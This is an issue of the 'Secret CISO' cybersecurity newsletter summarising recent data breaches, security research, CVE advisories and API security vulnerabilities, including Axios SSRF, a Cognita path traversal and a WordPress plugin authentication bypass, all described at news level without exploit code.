Welcome to today's issue of Secret CISO, your daily dose of the most impactful cybersecurity news.

Today, we delve into a series of data breaches that have rocked various sectors, from insurance and healthcare to education and telecommunications. Estrella Insurance and Hillcrest Convalescent Center are under investigation for data breaches that exposed personal information, including social security numbers and financial information. Meanwhile, Chicago Public Schools also suffered a data breach, although no social security numbers or financial information were reportedly accessed. On the international front, India has expressed deep concern over a security breach involving UK-based separatist and extremist elements. In Japan, telecom giant NTT Com revealed a data breach that affected almost 18,000 organizations.

In the legal arena, Central Texas Pediatric Orthopedics faces a class-action lawsuit over a data breach, and Archie Cochrane Motors is under investigation for a similar incident. In the realm of cybercrime, hackers leaked sensitive data from an elite Bronx private school following a ransomware attack, and a massive breach exposed Chicago Public Schools student data. In other news, the USAA has settled a $3.25 million lawsuit over a 2021 data breach affecting 22,000 customers, and the US seized $23 million in crypto stolen via a password manager breach.

As we navigate the evolving landscape of cyber threats, we also highlight the need for defenders to keep up with the 'commoditization' of ransomware and the importance of vulnerability disclosures among federal contractors. Stay tuned for more updates and remember, knowledge is the first line of defense. Stay safe, stay informed with Secret CISO.

Data Breaches

1. Federman & Sherwood Investigates Estrella Insurance for Data Breach: On February 1, 2025, Estrella Insurance experienced a data breach where personal information such as names and social security numbers were accessed. Source: Morningstar
2. Hillcrest Convalescent Center Data Breach: Personal information including names, social security numbers, date of birth, financial information, and medical data of individuals were potentially affected in a data breach at Hillcrest Convalescent Center. Source: Post Register
3. Chicago Public Schools Data Breach: Chicago Public Schools reported a data breach, however, no social security numbers, financial information, or health data were accessed during this incident. Source: NBC Chicago
4. Japanese Telco Giant NTT Com Data Breach: NTT Com, a Tokyo-based company providing phone and network tech to enterprises, reported a data breach on February 5, 2025, where hackers accessed details of almost 18,000 organizations. Source: TechCrunch
5. Central Texas Pediatric Orthopedics Data Breach: Central Texas Pediatric Orthopedics experienced a data breach, potentially affecting their clients. Legal action may be taken to recover any harm. Source: Class Action

Security Research

1. Malicious Fake Toll Scams: Security researchers have identified a new scam linked to Chinese smishing groups. These groups are known for creating and selling sophisticated SMS phishing kits, which are now being used to target drivers with fake toll scams. Source: The Trucker
2. LastPass Hacks Linked to $150M Cyberheist: In 2023, security researchers discovered a series of six-figure cyberheists. The federal investigation has now linked these heists to the LastPass hacks of 2022. Source: Krebs on Security
3. Climate Change Impact on Food Security: Researchers have found that climate change will increasingly impact our health and food security. More heavy rainfall events are expected, which could lead to an increase in E.coli outbreaks. Source: The Cooldown
4. Eleven11bot and the Mirai Variant: Security researchers have revised their estimates of the size of Eleven11bot, a botnet that has exploited IoT devices for DDoS attacks against telecom and gaming industries. The botnet is now believed to be a variant of Mirai. Source: Cybersecurity Dive
5. Jailbreaking LLM Models to Reveal Sensitive Data: Researchers have successfully jailbroken 17 popular generative AI (GenAI) web products, revealing vulnerabilities in their safety measures and exposing sensitive data. Source: GBHackers

Top CVEs

1. Microsoft Edge Spoofing Vulnerability (CVE-2025-26643): An unauthorized attacker can perform spoofing over Microsoft Edge (Chromium-based) due to an issue with no CWE. Source: CVE-2025-26643
2. Axios SSRF and Credential Leakage Vulnerability (CVE-2025-27152): Axios, a promise-based HTTP client for the browser and node.js, is vulnerable to SSRF and credential leakage when passing absolute URLs rather than protocol-relative URLs. This issue impacts both server-side and client-side usage of axios. Source: CVE-2025-27152
3. Cognita Path Traversal Vulnerability (CVE-2025-27519): Cognita, a RAG Framework for building modular applications, has a path traversal issue at /v1/internal/upload-to-local-directory which can be exploited when the Local env variable is set to true. This allows an attacker to get remote code execution in the context of the Docker container. Source: CVE-2025-27519
4. Sage 200 Spain Pass-Back Vulnerability (CVE-2025-1886): Sage 200 Spain versions prior to 2025.35.000 are vulnerable to a Pass-Back vulnerability that allows an authenticated attacker with administrator privileges to discover stored SMTP. Source: CVE-2025-1886
5. WPCOM Member Plugin Authentication Bypass (CVE-2025-1475): The WPCOM Member plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.7.5 due to insufficient verification on the 'user_phone' parameter when logging in. This allows unauthenticated attackers to log in as any existing user on the site. Source: CVE-2025-1475

API Security

1. Axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL: Axios, a popular HTTP client, has been found to be vulnerable to Server-Side Request Forgery (SSRF) and potential credential leakage when passing absolute URLs. This issue affects both server-side and client-side usage of Axios. The vulnerability arises when the baseURL is set, but Axios sends the request to the specified absolute URL, ignoring the baseURL. This could lead to SSRF and the leakage of sensitive information like API keys. Source: Vulners
2. Exploit for CVE-2024-57972: This exploit targets a Denial of Service (DoS) vulnerability in HoloLens via Device Portal functionalities. The attack requires the malicious individual to be connected to the same network as the target. The attacker can then use a security scanner to analyze the network and identify available devices. The exploit can overload the target system, causing it to become unresponsive to requests. Source: Vulners
3. CVE-2024-13857: The WPGet API – Connect to any external REST API plugin for WordPress is vulnerable to Server-Side Request Forgery (SSRF) in all versions up to, and including, 2.2.10. This vulnerability allows authenticated attackers with Administrator-level access to make web requests to arbitrary locations originating from the web application. This could be used to query and modify information from internal networks. Source: Vulners

Sponsored by Wallarm API Security Solution

Final Words

And that's a wrap for today's edition of Secret CISO. We've covered a range of data breaches and security issues, from Estrella Insurance to Central Texas Pediatric Orthopedics. It's clear that no sector is immune to these threats, highlighting the importance of robust cybersecurity measures. Remember, knowledge is power. By staying informed about these incidents, we can better protect our own systems and data.

If you found this newsletter helpful, please consider sharing it with your colleagues and friends. Let's work together to create a safer digital world. Stay safe and see you in the next edition of Secret CISO.